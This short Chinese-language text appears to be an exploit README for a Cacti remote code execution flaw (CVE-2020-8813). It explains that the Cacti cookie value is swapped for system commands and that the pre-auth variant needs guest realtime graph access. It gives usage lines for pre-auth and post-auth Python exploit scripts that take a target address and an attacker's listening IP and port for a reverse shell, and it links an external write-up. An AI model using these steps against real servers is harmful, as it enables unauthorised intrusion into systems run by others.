漏洞点在登录的Cookie变量Cacti的值,将其改为系统命令造成RCE;
但是操作Cookie值会遇到身份验证问题,因此需开启访客页面,配合利用。
Cacti <= 1.28暂无。编写nuclei的poc!!!
Pre-Auth RCE 前提:开启来宾实时图查看权限 graph_realtime.php?action=init 中包含poller_realtime.php
python Cacti-preauth-rce.py x.x.x.x ListeningIP ListeningPORT(VPS监听)Post-Auth RCE 前提:已知一个账户
python Cacti-postauth-rce.py x.x.x.x admin pass ListeningIP ListeningPORThttps://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/